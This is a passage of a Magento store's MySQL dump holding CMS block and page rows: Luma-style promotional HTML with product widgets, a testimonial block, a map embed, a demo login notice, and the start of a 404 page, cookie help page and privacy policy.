MP03`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(22, 'Gear Block', 'gear-block', '<div class=\"blocks-promo\">\n    <a href=\"{{store url=\"\"}}gear.html\" class=\"block-promo gear-main\">\n        <img src=\"{{media url=\"wysiwyg/gear/gear-main.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <strong class=\"title\">Sprite Yoga Companion Kit</strong>\n            <span class=\"info\">Save up to 20% on a&nbsp;bundle!</span>\n            <span class=\"more button\">Shop Yoga Kit</span>\n        </span>\n    </a>\n    <div class=\"block-promo-wrapper block-promo-2columns\">\n        <a href=\"{{store url=\"\"}}gear/fitness-equipment.html\" class=\"block-promo gear-fitnes\">\n            <img src=\"{{media url=\"wysiwyg/gear/gear-fitnes.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Loosen Up</strong>\n                <span class=\"info\">Extend your training with yoga straps, tone bands,<br />and jump ropes</span>\n                <span class=\"more icon\">Shop Fitness</span>\n            </span>\n        </a>\n        <a href=\"{{store url=\"\"}}gear/fitness-equipment.html\" class=\"block-promo gear-equipment\">\n            <img src=\"{{media url=\"wysiwyg/gear/gear-equipment.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Here’s to you!</strong>\n                <span class=\"info\">$4 Luma water bottle<br />(save&nbsp;70%)</span>\n                <span class=\"note\">Enter promo code H2O<br />at check out</span>\n            </span>\n        </a>\n    </div>\n    <div class=\"block-promo-wrapper block-promo-3columns\">\n        <a href=\"{{store url=\"\"}}gear/bags.html\" class=\"block-promo gear-category-bags\">\n            <span class=\"content\">\n                <strong class=\"title\">Tote, cart or carry</strong>\n                <span class=\"info\">Luma bags go the distance</span>\n                <span class=\"more icon\">Shop Bags</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/gear/gear-category-bags.jpg\"}}\" alt=\"\" /></span>\n        </a>\n        <a href=\"{{store url=\"\"}}gear/fitness-equipment.html\" class=\"block-promo gear-category-equipment\">\n            <span class=\"content\">\n                <strong class=\"title\">Let’s get after it!</strong>\n                <span class=\"info\">Luma gym equipment fits your goals and&nbsp;style</span>\n                <span class=\"more icon\">Shop Equipment</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/gear/gear-category-equipment.jpg\"}}\" alt=\"\" /></span>\n        </a>\n        <a href=\"{{store url=\"\"}}gear/watches.html\" class=\"block-promo gear-category-watches\">\n            <span class=\"content\">\n                <strong class=\"title\">Luma watches</strong>\n                <span class=\"info\">Keeping pace has never been more stylish</span>\n                <span class=\"more icon\">Shop Watches</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/gear/gear-category-watches.jpg\"}}\" alt=\"\" /></span>\n        </a>\n    </div>\n</div>\n<div class=\"content-heading\">\n    <h2 class=\"title\">Hot Sellers</h2>\n    <p class=\"info\">Favorites from Luma shoppers</p>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_per_page=\"4\" products_count=\"4\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`sku`,`operator`:`()`,`value`:`24-MB02, 24-WB04, 24-UG06, 24-WG080`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(23, 'Sale Block', 'sale-block', '<div class=\"blocks-promo\">\n    <a href=\"{{store url=\"\"}}promotions/women-sale.html\" class=\"block-promo sale-main\">\n        <img src=\"{{media url=\"wysiwyg/sale/sale-main.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <span class=\"info\">Women’s Deals</span>\n            <strong class=\"title\">Pristine prices on pants, tanks and bras.</strong>\n            <span class=\"more button\">Shop Women’s Deals</span>\n        </span>\n    </a>\n    <div class=\"block-promo-wrapper block-promo-2columns\">\n        <a href=\"{{store url=\"\"}}promotions/men-sale.html\" class=\"block-promo sale-mens\">\n            <img src=\"{{media url=\"wysiwyg/sale/sale-mens.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Men’s Bargains</strong>\n                <span class=\"info\">Stretch your budget with active attire</span>\n                <span class=\"more icon\">Shop Men’s Deals</span>\n            </span>\n        </a>\n        <a href=\"{{store url=\"\"}}gear.html\" class=\"block-promo sale-women\">\n            <img src=\"{{media url=\"wysiwyg/sale/sale-gear.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Luma Gear Steals</strong>\n                <span class=\"info\">Your best efforts deserve a deal</span>\n                <span class=\"more icon\">Shop Luma Gear</span>\n            </span>\n        </a>\n    </div>\n    <div class=\"block-promo-wrapper block-promo-3columns\">\n        <a class=\"block-promo sale-20-off\">\n            <span class=\"content\">\n                <strong class=\"title\">20% OFF</strong>\n                <span class=\"info\">Every $200-plus purchase!</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/sale/sale-20-off.png\"}}\" alt=\"\" /></span>\n        </a>\n        <a class=\"block-promo sale-free-shipping\">\n            <span class=\"content\">\n                <strong class=\"title\">Spend $50 or more&nbsp;&mdash; shipping is free!</strong>\n                <img src=\"{{media url=\"wysiwyg/sale/sale-free-shipping.png\"}}\" alt=\"\" />\n                <span class=\"info\">Buy more, save more</span>\n            </span>\n        </a>\n        <a href=\"{{store url=\"\"}}women/tops-women/tees-women.html\" class=\"block-promo sale-womens-t-shirts\">\n            <span class=\"content\">\n                <strong class=\"title\">You can\'t have too many tees</strong>\n                <span class=\"info\">4 tees for the price of 3. Right now</span>\n                <span class=\"more icon\">Tees on sale</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/womens/womens-t-shirts.png\"}}\" alt=\"\" /></span>\n        </a>\n    </div>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(24, 'New Block', 'new-block', '<div class=\"blocks-promo\">\n    <a href=\"{{store url=\"\"}}collections/yoga-new.html\" class=\"block-promo new-main\">\n        <img src=\"{{media url=\"wysiwyg/new/new-main.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <span class=\"info\">New Luma Yoga Collection</span>\n            <strong class=\"title\">The very latest yoga styles  plus twists on timeless classics</strong>\n            <span class=\"more button\">Shop New Yoga</span>\n        </span>\n    </a>\n\n    <div class=\"block-promo-wrapper block-promo-2columns\">\n        <a href=\"{{store url=\"\"}}collections/performance-new.html\" class=\"block-promo new-performance\">\n            <img src=\"{{media url=\"wysiwyg/new/new-performance.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Whatever day brings</strong>\n                <span class=\"info\">Luma Cocona<sup>™</sup> for breathability, CoolTech<sup>™</sup> for wicking, or a blend of&nbsp;both.</span>\n                <span class=\"more icon\">Performance Fabrics</span>\n            </span>\n        </a>\n        <a href=\"{{store url=\"\"}}collections/eco-new.html\" class=\"block-promo new-eco\">\n            <img src=\"{{media url=\"wysiwyg/new/new-eco.jpg\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">A sense of renewal</strong>\n                <span class=\"info\">Enjoy comfort of body and mind with Luma eco-friendly choices</span>\n                <span class=\"more icon\">Shop Eco Friendly </span>\n            </span>\n        </a>\n    </div>\n</div>\n<div class=\"content-heading\">\n    <h2 class=\"title\">Luma\'s Latest</h2>\n    <p class=\"info\">Just in time for the new season!</p>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_per_page=\"4\" products_count=\"4\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`new`,`operator`:`==`,`value`:`1`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(25, 'Home Page Block', 'home-page-block', '<div class=\"blocks-promo\">\n   <a href=\"{{store url=\"\"}}collections/yoga-new.html\" class=\"block-promo home-main\">\n       <img src=\"{{media url=\"wysiwyg/home/home-main.jpg\"}}\" alt=\"\" />\n       <span class=\"content bg-white\">\n           <span class=\"info\">New Luma Yoga Collection</span>\n           <strong class=\"title\">Get fit and look fab in new seasonal styles</strong>\n           <span class=\"action more button\">Shop New Yoga</span>\n       </span>\n   </a>\n   <div class=\"block-promo-wrapper block-promo-hp\">\n       <a href=\"{{store url=\"\"}}promotions/pants-all.html\" class=\"block-promo home-pants\">\n           <img src=\"{{media url=\"wysiwyg/home/home-pants.jpg\"}}\" alt=\"\" />\n           <span class=\"content\">\n               <strong class=\"title\">20% OFF</strong>\n               <span class=\"info\">Luma pants when you shop today*</span>\n               <span class=\"action more icon\">Shop Pants</span>\n           </span>\n       </a>\n       <a href=\"{{store url=\"\"}}promotions/tees-all.html\" class=\"block-promo home-t-shirts\">\n           <span class=\"image\"><img src=\"{{media url=\"wysiwyg/home/home-t-shirts.png\"}}\" alt=\"\" /></span>\n           <span class=\"content\">\n               <strong class=\"title\">Even more ways to mix and match</strong>\n               <span class=\"info\">Buy 3 Luma tees get a 4th free</span>\n               <span class=\"action more icon\">Shop Tees</span>\n           </span>\n       </a>\n       <a href=\"{{store url=\"\"}}collections/erin-recommends.html\" class=\"block-promo home-erin\">\n           <img src=\"{{media url=\"wysiwyg/home/home-erin.jpg\"}}\" alt=\"\" />\n           <span class=\"content\">\n               <strong class=\"title\">Take it from Erin</strong>\n               <span class=\"info\">Luma founder Erin Renny shares her favorites!</span>\n               <span class=\"action more icon\">Shop Erin Recommends</span>\n           </span>\n       </a>\n       <a href=\"{{store url=\"\"}}collections/performance-fabrics.html\" class=\"block-promo home-performance\">\n           <img src=\"{{media url=\"wysiwyg/home/home-performance.jpg\"}}\" alt=\"\" />\n           <span class=\"content bg-white\">\n               <strong class=\"title\">Science meets performance</strong>\n               <span class=\"info\">Wicking to raingear, Luma covers&nbsp;you</span>\n               <span class=\"action more icon\">Shop Performance</span>\n           </span>\n       </a>\n       <a href=\"{{store url=\"\"}}collections/eco-friendly.html\" class=\"block-promo home-eco\">\n           <img src=\"{{media url=\"wysiwyg/home/home-eco.jpg\"}}\" alt=\"\" />\n           <span class=\"content bg-white\">\n               <strong class=\"title\">Twice around, twice as nice</strong>\n               <span class=\"info\">Find conscientious, comfy clothing in our <nobr>eco-friendly</nobr> collection</span>\n               <span class=\"action more icon\">Shop Eco-Friendly</span>\n           </span>\n       </a>\n   </div>\n</div>\n<div class=\"content-heading\">\n   <h2 class=\"title\">Hot Sellers</h2>\n   <p class=\"info\">Here is what`s trending on Luma right now</p>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_per_page=\"8\" products_count=\"8\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`sku`,`operator`:`()`,`value`:`WS12, WT09, MT07, MH07, 24-MB02, 24-WB04, 241-MB08, 240-LV05`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(26, 'Performance Fabrics Block', 'performance-fabrics-block', '<div class=\"blocks-promo\">\n   <div class=\"block-promo collection-performance\">\n       <img src=\"{{media url=\"wysiwyg/collection/collection-performance.jpg\"}}\" alt=\"\" />\n       <span class=\"content\">\n           <strong class=\"title\">You\'re the best</strong>\n           <span class=\"info\">Make a strong statement with Luma Performance sportswear</span>\n       </span>\n   </div>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_count=\"5\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`performance_fabric`,`operator`:`==`,`value`:`1`^],`1--2`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`new`,`operator`:`==`,`value`:`1`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(27, 'Eco Friendly Block', 'eco-friendly-block', '<div class=\"blocks-promo\">\n    <div class=\"block-promo collection-eco\">\n        <img src=\"{{media url=\"wysiwyg/collection/collection-eco.jpg\"}}\" alt=\"\" />\n        <span class=\"content\">\n            <strong class=\"title\">Eco-friendly, ego-friendly</strong>\n            <span class=\"info\">Recycled polyester, hemp and organic cotton apperel</span>\n        </span>\n    </div>\n</div>\n{{widget type=\"Magento\\CatalogWidget\\Block\\Product\\ProductsList\" products_count=\"5\" template=\"product/widget/content/grid.phtml\" conditions_encoded=\"^[`1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Combine`,`aggregator`:`all`,`value`:`1`,`new_child`:``^],`1--1`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`eco_collection`,`operator`:`==`,`value`:`1`^],`1--2`:^[`type`:`Magento||CatalogWidget||Model||Rule||Condition||Product`,`attribute`:`new`,`operator`:`==`,`value`:`1`^]^]\"}}', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(28, 'Giftcard Block', 'giftcard-block', '<div class=\"blocks-promo\">\n    <div class=\"block-promo-wrapper block-promo-2columns\">\n        <a href=\"{{store url=\"\"}}\" class=\"block-promo giftcard-mailed\">\n            <span class=\"content\">\n                <strong class=\"title\">Give it away now</strong>\n                <span class=\"info\">A gift card always beats a blind guess</span>\n                <span class=\"more icon\">Mailed Gift Cards</span>\n            </span>\n            <span class=\"image\"><img src=\"{{media url=\"wysiwyg/giftcards/giftcard-mailed.jpg\"}}\" alt=\"\" /></span>\n        </a>\n        <a href=\"{{store url=\"\"}}\" class=\"block-promo giftcard-virtual\">\n            <img src=\"{{media url=\"wysiwyg/giftcards/giftcard-virtual.png\"}}\" alt=\"\" />\n            <span class=\"content\">\n                <strong class=\"title\">Can\'t decide?</strong>\n                <span class=\"info\">Just remember it\'s the card that counts</span>\n                <span class=\"more icon\">Virtual Gift Cards</span>\n            </span>\n        </a>\n    </div>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(29, 'Login Info Block', 'login-data', '<div class=\"message info\" style=\"margin-top: 50px;\">\n    <p><strong>Try Demo Customer Access</strong></p>\n    <p><span style=\"display:inline-block; width: 80px; padding-right: 10px;\">Email:</span>roni_cost@example.com</p>\n    <p><span style=\"display:inline-block; width: 80px; padding-right: 10px;\">Password:</span>roni_cost3@example.com</p>\n</div>', '2020-08-08 01:45:08', '2020-08-08 01:45:08', 1),
(30, 'Customer testimonial', 'customer_testimonial', '<div class=\"item\">\r\n<div class=\"testimonial-content\">\r\n<p class=\"testimonialCont\">Ramybd is my go to place for all my cosmetics needs. The products are genuine and the service is unbeatable. it has my vote!</p>\r\n<p class=\"name_testimonial\"><span class=\"name\">Aamir Mazhar</span>Event Manager</p>\r\n<div class=\"testimonial img\"><img src=\"{{media url=\"wysiwyg/testimonial.png\"}}\" alt=\"\"></div>\r\n</div>\r\n</div>\r\n<div class=\"item\">\r\n<div class=\"testimonial-content\">\r\n<p class=\"testimonialCont\">Ramybd is my go to place for all my cosmetics needs. The products are genuine and the service is unbeatable. it has my vote!</p>\r\n<p class=\"name_testimonial\"><span class=\"name\">Aamir Mazhar</span>Event Manager</p>\r\n<div class=\"testimonial img\"><img src=\"{{media url=\"wysiwyg/testimonial.png\"}}\" alt=\"\"></div>\r\n</div>\r\n</div>\r\n<div class=\"item\">\r\n<div class=\"testimonial-content\">\r\n<p class=\"testimonialCont\">Ramybd is my go to place for all my cosmetics needs. The products are genuine and the service is unbeatable. it has my vote!</p>\r\n<p class=\"name_testimonial\"><span class=\"name\">Aamir Mazhar</span>Event Manager</p>\r\n<div class=\"testimonial img\"><img src=\"{{media url=\"wysiwyg/testimonial.png\"}}\" alt=\"\"></div>\r\n</div>\r\n</div>', '2020-08-18 04:50:48', '2020-08-18 07:02:28', 1),
(31, 'Discounted Products', 'Discounted-Products', '<p>{{widget type=\"Magento\\Catalog\\Block\\Product\\Widget\\NewWidget\" display_type=\"all_products\" show_pager=\"0\" products_count=\"10\" template=\"product/widget/new/content/new_grid.phtml\"}}</p>', '2020-08-24 01:04:22', '2020-08-24 01:04:22', 1),
(32, 'Google Map', 'google_map_enable', '<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d58441.603093602214!2d90.36645250719727!3d23.725967355525984!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3755b8f5fe710463%3A0x1fcee9300ab32d9b!2sRupayan%20Taj%2C%20Culvert%20Road%2C%20Dhaka%201205!5e0!3m2!1sen!2sbd!4v1623143274744!5m2!1sen!2sbd\" width=\"600\" height=\"450\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\"></iframe>', '2021-06-08 09:08:48', '2021-06-08 09:08:48', 1);

-- --------------------------------------------------------

--
-- Table structure for table `cms_block_store`
--

CREATE TABLE `cms_block_store` (
  `block_id` smallint(6) NOT NULL,
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CMS Block To Store Linkage Table';

--
-- Dumping data for table `cms_block_store`
--

INSERT INTO `cms_block_store` (`block_id`, `store_id`) VALUES
(1, 0),
(2, 0),
(3, 0),
(4, 0),
(5, 0),
(6, 0),
(7, 0),
(8, 0),
(9, 0),
(10, 0),
(11, 0),
(12, 0),
(13, 0),
(14, 0),
(15, 0),
(16, 0),
(17, 0),
(18, 0),
(19, 0),
(20, 0),
(21, 0),
(22, 0),
(23, 0),
(24, 0),
(25, 0),
(26, 0),
(27, 0),
(28, 0),
(29, 0),
(30, 0),
(31, 0),
(32, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cms_page`
--

CREATE TABLE `cms_page` (
  `page_id` smallint(6) NOT NULL COMMENT 'Entity ID',
  `title` varchar(255) DEFAULT NULL COMMENT 'Page Title',
  `page_layout` varchar(255) DEFAULT NULL COMMENT 'Page Layout',
  `meta_keywords` text DEFAULT NULL COMMENT 'Page Meta Keywords',
  `meta_description` text DEFAULT NULL COMMENT 'Page Meta Description',
  `identifier` varchar(100) DEFAULT NULL COMMENT 'Page String Identifier',
  `content_heading` varchar(255) DEFAULT NULL COMMENT 'Page Content Heading',
  `content` mediumtext DEFAULT NULL COMMENT 'Page Content',
  `creation_time` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Page Creation Time',
  `update_time` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Page Modification Time',
  `is_active` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Is Page Active',
  `sort_order` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Page Sort Order',
  `layout_update_xml` text DEFAULT NULL COMMENT 'Page Layout Update Content',
  `custom_theme` varchar(100) DEFAULT NULL COMMENT 'Page Custom Theme',
  `custom_root_template` varchar(255) DEFAULT NULL COMMENT 'Page Custom Template',
  `custom_layout_update_xml` text DEFAULT NULL COMMENT 'Page Custom Layout Update Content',
  `layout_update_selected` varchar(128) DEFAULT NULL COMMENT 'Page Custom Layout File',
  `custom_theme_from` date DEFAULT NULL COMMENT 'Page Custom Theme Active From Date',
  `custom_theme_to` date DEFAULT NULL COMMENT 'Page Custom Theme Active To Date',
  `meta_title` varchar(255) DEFAULT NULL COMMENT 'Page Meta Title'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='CMS Page Table';

--
-- Dumping data for table `cms_page`
--

INSERT INTO `cms_page` (`page_id`, `title`, `page_layout`, `meta_keywords`, `meta_description`, `identifier`, `content_heading`, `content`, `creation_time`, `update_time`, `is_active`, `sort_order`, `layout_update_xml`, `custom_theme`, `custom_root_template`, `custom_layout_update_xml`, `layout_update_selected`, `custom_theme_from`, `custom_theme_to`, `meta_title`) VALUES
(1, '404 Not Found', '2columns-right', 'Page keywords', 'Page description', 'no-route', 'Whoops, our bad...', '<dl>\r\n<dt>The page you requested was not found, and we have a fine guess why.</dt>\r\n<dd>\r\n<ul class=\"disc\">\r\n<li>If you typed the URL directly, please make sure the spelling is correct.</li>\r\n<li>If you clicked on a link to get here, the link is outdated.</li>\r\n</ul></dd>\r\n</dl>\r\n<dl>\r\n<dt>What can you do?</dt>\r\n<dd>Have no fear, help is near! There are many ways you can get back on track with Magento Store.</dd>\r\n<dd>\r\n<ul class=\"disc\">\r\n<li><a href=\"#\" onclick=\"history.go(-1); return false;\">Go back</a> to the previous page.</li>\r\n<li>Use the search bar at the top of the page to search for your products.</li>\r\n<li>Follow these links to get you back on track!<br /><a href=\"{{store url=\"\"}}\">Store Home</a> <span class=\"separator\">|</span> <a href=\"{{store url=\"customer/account\"}}\">My Account</a></li></ul></dd></dl>\r\n', '2020-08-02 13:12:55', '2020-08-02 13:12:55', 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(2, 'Home Page', '1column', '', '', 'home', 'Home Page', '', '2020-08-02 13:12:55', '2020-08-22 10:24:16', 1, 0, NULL, '', '', NULL, NULL, NULL, NULL, ''),
(3, 'Enable Cookies', '1column', NULL, NULL, 'enable-cookies', 'What are Cookies?', '<div class=\"enable-cookies cms-content\">\r\n<p>\"Cookies\" are little pieces of data we send when you visit our store. Cookies help us get to know you better and personalize your experience. Plus they help protect you and other shoppers from fraud.</p>\r\n<p style=\"margin-bottom: 20px;\">Set your browser to accept cookies so you can buy items, save items, and receive customized recommendations. Here’s how:</p>\r\n<ul>\r\n<li><a href=\"https://support.google.com/accounts/answer/61416?hl=en\" target=\"_blank\">Google Chrome</a></li>\r\n<li><a href=\"http://windows.microsoft.com/en-us/internet-explorer/delete-manage-cookies\" target=\"_blank\">Internet Explorer</a></li>\r\n<li><a href=\"http://support.apple.com/kb/PH19214\" target=\"_blank\">Safari</a></li>\r\n<li><a href=\"https://support.mozilla.org/en-US/kb/enable-and-disable-cookies-website-preferences\" target=\"_blank\">Mozilla/Firefox</a></li>\r\n</ul>\r\n</div>', '2020-08-02 13:12:55', '2020-08-02 13:12:55', 1, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(4, 'Privacy Policy', '1column', '', '', 'privacy-policy-cookie-restriction-mode', 'Privacy Policy', '<div class=\"privacy-policy cms-content\">\n    <div class=\"privacy-policy-content\">\n        <p>This website (\"website\") is operated by Luma Inc., which includes Luma stores, and Luma Private Sales. This privacy policy only covers information collected at this website, and does not cover any information collected offline by Luma. All Luma websites are covered by this privacy policy.</p>\n\n        <h2 id=\"privacy-policy-title-1\">Luma Security</h2>\n        <p>Personal information provided on the website and online credit card transactions are transmitted through a secure server. We are committed to handling your personal information with high standards of information security. We take appropriate physical, electronic, and administrative steps to maintain the security and accuracy of personally identifiable information we collect, including limiting the number of people who have physical access to our database servers, as well as employing electronic security systems and password protections that guard against unauthorized access.</p>\n\n        <p>Our website uses encryption technology, like Secure Sockets Layer (SSL), to protect your personal information during data transport. SSL encrypts ordering information such as your name, address, and credit card number. Our Customer Care center and stores also operate over a private, secure network. Please note that email is not encrypted and is not considered to be a secure means of transmitting credit card information.</p>\n\n        <h2 id=\"privacy-policy-title-2\">Luma Privacy Policy</h2>\n        <p>To help us achieve our goal of providing the highest quality products and services, we use information from our interactions with you and other customers, as well as from other parties. Because we respect your privacy, we have implemented procedures to ensure that your personal information is handled in a safe, secure, and responsible manner. We have posted this privacy policy in order to explain our information collection practices and the choices you have about the way information is collected and used.</p>\n\n        <p>As we continue to develop the Luma website and take advantage of advances in technology to improve the services we offer, this privacy policy likely will change. We therefore encourage you to refer to this policy on an ongoing basis so that you understand our current privacy policy.</p>\n\n        <h2 id=\"privacy-policy-title-3\">The Information We Collect</h2>\n        <p>Generally, you may browse the Luma website without providing any personally identifiable information. However, we may ask you to provide personally identifiable information at various times and places on this website. In some cases, if you choose not to provide us with the requested information, you may not be able to access all parts of this website or participate in all of its features, pricing, and product selection.</p>\n\n        <p>We may collect the following information:</p>\n        <ul>\n            <li>name</li>\n            <li>contact information including email address</li>\n            <li>demographic information such as postcode, preferences and interests</li>\n            <li>other information relevant to customer surveys and/or offers</li>\n        </ul>\n        <p>For the exhaustive list of cookies we collect see the <a href=\"#privacy-policy-title-10\">List of cookies we collect</a> section. From your purchases and other interactions with us, we obtain information concerning the specific products or services you purchase or use. When you visit this website, our web server automatically collects anonymous information such as log data and IP addresses, and may collect general information concerning your location. We may use the automatically collected information for a number of purposes, such as improving our site design, product assortments, customer service, and special promotions.</p>\n        <h2 id=\"privacy-policy-title-4\">How We Use The Information We Collect</h2>\n        <p>We require this information to understand your needs and provide you with a better service, and in particular for the following reasons:</p>\n        <ul>\n            <li>Internal record keeping.</li>\n            <li>We may use the information to improve our products and services.</li>\n            <li>We may periodically send promotional emails about new products, special offers or other information which we think you may find interesting using the email address which you have provided.</li>\n            <li>From time to time, we may also use your information to contact you for market research purposes. We may contact you by email, phone, fax or mail. We may use the information to customize the website according to your interests.</li>\n        </ul>\n\n        <h2 id=\"privacy-policy-title-5\">Security</h2>\n        <p>We are committed to ensuring that your information is secure. In order to prevent unauthorized access or disclosure, we have put in place suitable physical, electronic and managerial procedures to safeguard and secure the information we collect online.</p>\n\n        <h2 id=\"privacy-policy-title-6\">Others With Whom We Share Your Information.</h2>\n        <p><b>The Luma Group:</b> All of the above information that we collect, as described  above, may be shared among all Luma entities, including Luma Venia and Luma  Terra stores, website and Private Sales.</p>\n\n        <p><b>Service Providers:</b> We also may disclose information to outside companies that  help us bring you the products and services we offer. For example, we may work  with an outside company to: (a) manage a database of customer information; (b)  assist us in distributing emails; (c) assist us with direct marketing and data  collection; (d) provide us storage and analysis; (d) provide fraud prevention; and  (e) provide other services designed to assist us in maximizing our business potential. We require that these outside companies agree to keep confidential all information we share with them and to use the information only to perform their obligations in our agreements with them.</p>\n\n        <p><b>Other Companies:</b> We may provide information to carefully selected outside companies when we believe their products or services may be of interest to you.</p>\n\n        <p><b>Business Transitions:</b> We may transfer or share a copy of personal information about you in the event that Luma or one of its properties, affiliates, or subsidiaries goes through a business transition, such as a merger, being acquired by another company, or selling a portion of its assets. You will be notified via email or prominent notice on our website prior to a change of ownership or control of your personal information, if your personal information will be used contrary to this policy. However, nothing in this Privacy Policy is intended to interfere with the ability of Luma to transfer all or part of its business and/or assets to an affiliate or independent third party at any time, for any purpose, without any limitation whatsoever.</p>\n\n        <p>Luma specifically reserves the right to transfer or share a copy of personally identifiable information collected from its websites to the buyer of that portion of its business relating to that information.</p>\n\n        <p><b>Compliance with Law:</b> We may provide access to information when legally required to do so, to cooperate with police investigations or other legal proceedings, to protect against misuse or unauthorized use of our website, to limit our legal liability, and to protect our rights or to protect the rights, property, or safety of visitors of this website or the public.</p>\n\n        <p>Luma partners with advertising companies to place our advertising on publisher websites on the Internet. These advertising companies collect anonymous information about your visits to our web site. This technology involves the use of third party cookies that allow them to develop personalized advertising so that it directly relates to offers that may be of interest to you. You may choose to opt-out of this service we have with our third-party advertising partner. We may also use Luma cookies to provide similar enhanced online marketing to you based on your interests and preferences. You may also choose to opt out of these enhanced online marketing ads.</p>\n\n        <h2 id=\"privacy-policy-title-7\">Your Choices Regarding Use Of The Information We Collect</h2>\n\n        <p>You have several choices regarding our handling of your nonpublic personally identifiable information.</p>\n\n        <p>\n            <b>Direct Mail or Telephone Marketing:</b> If you shop at the Luma or Private Sales stores and wish to be removed from the list of customers that receive direct mail or telemarketing calls, please either write to Luma Customer Care at 112 West  34th Street, 18th Flr. New York, NY 10120 or call +1 800-403-8838. If you choose to write to us, please include your name, address, and credit card account number (if you have one), and state one of the following:\n            <ul>\n                <li>\"NO MAIL OFFERS\" (if you don\'t want to receive offers by mail);</li>\n                <li>\"NO PHONE OFFERS\" (if you don\'t want to receive offers by phone);</li>\n                <li>\"NO PHONE OR MAIL OFFERS\" (if you don\'t want to receive either).</li>\n            </ul>\n        </p>\n\n        <p>Because customer lists often are prepared well in advance of an offering  (sometimes a few months before the offer is made), you may continue to receive  some offers after you send us a request not to use your information for specified  marketing purposes. We appreciate your patience and understanding in giving us  time to carry out your request.</p>\n\n        <h2 id=\"privacy-policy-title-8\">Your California Privacy Rights</h2>\n        <p>Under California Civil Code sections 1798.83-1798.84, California residents are  entitled to ask us for a notice describing what categories of personal customer  information we share with third parties or corporate affiliates for those third  parties or corporate affiliates\' direct marketing purposes. That notice will identify  the categories of information shared and will include a list of the third parties and  affiliates with which it was shared, along with their names and addresses. If you  are a California resident and would like a copy of this notice, please submit a  written request to the following address: Luma Customer Care, 112 West 34th  Street, 18th Floor, New York, NY 10120. Please allow 30 days for a response.</p>\n\n        <h2 id=\"privacy-policy-title-9\">Cookies, Web Beacons, and How We Use Them</h2>\n        <p>A cookie is a small file which asks permission to be placed on your computer\'s hard drive. Once you agree, the file is added and the cookie helps analyze web traffic or lets you know when you visit a particular site. Cookies allow web applications to respond to you as an individual. The web application can tailor its operations to your needs, likes and dislikes by gathering and remembering information about your preferences.</p>\n\n        <p>We use traffic log cookies to identify which pages are being used. This helps us analyze data about web page traffic and improve our website in order to tailor it to customer needs. We only use this information for statistical analysis purposes and then the data is removed from the system.</p>\n\n        <p>Overall, cookies help us provide you with a better website, by enabling us to monitor which pages you find useful and which you do not. A cookie in no way gives us 